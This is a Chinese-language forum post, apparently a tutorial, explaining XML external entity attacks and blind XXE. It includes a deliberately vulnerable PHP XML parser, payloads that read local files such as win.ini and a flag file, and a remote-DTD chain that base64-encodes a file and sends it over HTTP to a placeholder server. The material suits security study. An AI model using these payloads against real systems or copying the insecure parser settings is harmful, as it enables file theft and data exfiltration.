安全矩阵

 找回密码
 立即注册
搜索
查看: 2517|回复: 0

浅析无回显的XXE(Blind XXE)

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-5-13 23:08:55 | 显示全部楼层 |阅读模式
原文链接:浅析无回显的XXE(Blind XXE)

xml介绍

XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。但是,在处理外部实体时,可以针对应用程序启动许多攻击。这些攻击包括泄露本地系统文件,这些文件可能包含密码和私人用户数据等敏感数据,或利用各种方案的网络访问功能来操纵内部应用程序。通过将这些攻击与其他实现缺陷相结合,这些攻击的范围可以扩展到客户端内存损坏,任意代码执行,甚至服务中断,具体取决于这些攻击的上下文。

内部实体

XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的。

  1. <?xml version="1.0"?>//这一行是 XML 文档定义
  2. <!DOCTYPE message [
  3. <!ELEMENT message (receiver ,sender ,header ,msg)>
  4. <!ELEMENT receiver (#PCDATA)>
  5. <!ELEMENT sender (#PCDATA)>
  6. <!ELEMENT header (#PCDATA)>
  7. <!ELEMENT msg (#PCDATA)>
复制代码

上面这个 DTD 就定义了 XML 的根元素是 message,然后跟元素下面有一些子元素,那么 XML 到时候必须像下面这么写
  1. <message>
  2. <receiver>Myself</receiver>
  3. <sender>Someone</sender>
  4. <header>TheReminder</header>
  5. <msg>This is an amazing book</msg>
  6. </message>
复制代码
其实除了在 DTD 中定义元素(其实就是对应 XML 中的标签)以外,我们还能在 DTD 中定义实体(对应XML 标签中的内容),毕竟 XML 中除了能标签以外,还需要有些内容是固定的
  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY xxe "test" >]>
复制代码

这里 定义元素为 ANY 说明接受任何元素,但是定义了一个 xml 的实体(实体其实可以看成一个变量,到时候我们可以在 XML 中通过 & 符号进行引用),那么 XML 就可以写成这样

示例代码:

  1. <creds>
  2. <user>&xxe;</user>
  3. <pass>mypass</pass>
  4. </creds>
复制代码

我们使用 &xxe 对 上面定义的 xxe 实体进行了引用,到时候输出的时候 &xxe 就会被 "test" 替换。

外部实体

示例代码:

  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
  5. <creds>
  6.     <user>&xxe;</user>
  7.     <pass>mypass</pass>
  8. </creds>
复制代码
当然,还有一种引用方式是使用 引用公用 DTD 的方法,语法如下:
  1. <!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>
复制代码

我们上面已经将实体分成了两个派别(内部实体和外部外部),但是实际上从另一个角度看,实体也可以分成两个派别(通用实体和参数实体)。

通用实体

用 &实体名;在DTD 中定义,在 XML 文档中引用

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
  3. <updateProfile>  
  4.     <firstname>Joe</firstname>  
  5.     <lastname>&file;</lastname>  
  6.     ...
  7. </updateProfile>
复制代码

参数实体

(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体(3)和通用实体一样,参数实体也可以外部引用

示例代码:

  1. <!ENTITY % an-element "<!ELEMENT mytag (subtag)>">
  2. <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
  3. %an-element; %remote-dtd;
复制代码

抛转:参数实体在我们 Blind XXE 中起到了至关重要的作用

有回显XXE

这个实验的攻击场景模拟的是在服务能接收并解析 XML 格式的输入并且有回显的时候,我们就能输入我们自定义的 XML 代码,通过引用外部实体的方法,引用服务器上面的文件。

本地服务器上放上解析 XML 的 php 代码:

xml.php

  1. <?php
  2.     libxml_disable_entity_loader (false);
  3.     $xmlfile = file_get_contents('php://input');
  4.     $dom = new DOMDocument();
  5.     $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  6.     $creds = simplexml_import_dom($dom);
  7.     echo $creds;
  8. ?>
复制代码

其中:LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件

触发xxe

  1. <!DOCTYPE foo [
  2. <!ELEMENT foo ANY >
  3. <!ENTITY xxe "Hello world!" >]>
复制代码


读取本地服务器C盘的flag文件

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE creds [  
  3. <!ENTITY goodies SYSTEM "file:///c:/flag"> ]>
  4. <creds>&goodies;</creds>
复制代码

引用外部实体读取文件


引用方式是使用 引用公用 DTD 的方法读取


无回显XXE

有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器。

xml.php

  1. <?php
  2. libxml_disable_entity_loader (false);
  3. $xmlfile = file_get_contents('php://input');
  4. $dom = new DOMDocument();
  5. $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  6. ?>
复制代码
test.dtd
  1. <!ENTITY % file SYSTEM
  2. "php://filter/read=convert.base64-encode/resource=file:///c:/xxx.txt">
  3. <!ENTITY % int "<!ENTITY % send SYSTEM 'http://xxx?p=file;'>">
复制代码
payload
  1. <!DOCTYPE convert [
  2. <!ENTITY % remote SYSTEM "http://ip/test.dtd">
  3. %remote;%int;%send;
  4. ]>
复制代码

我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。


这样,我们就读到了flag文件的内容。

参考文章

https://xz.aliyun.com/t/3357#toc-10 一篇文章带你深入理解漏洞之 XXE 漏洞


























本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 08:44 , Processed in 0.013287 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表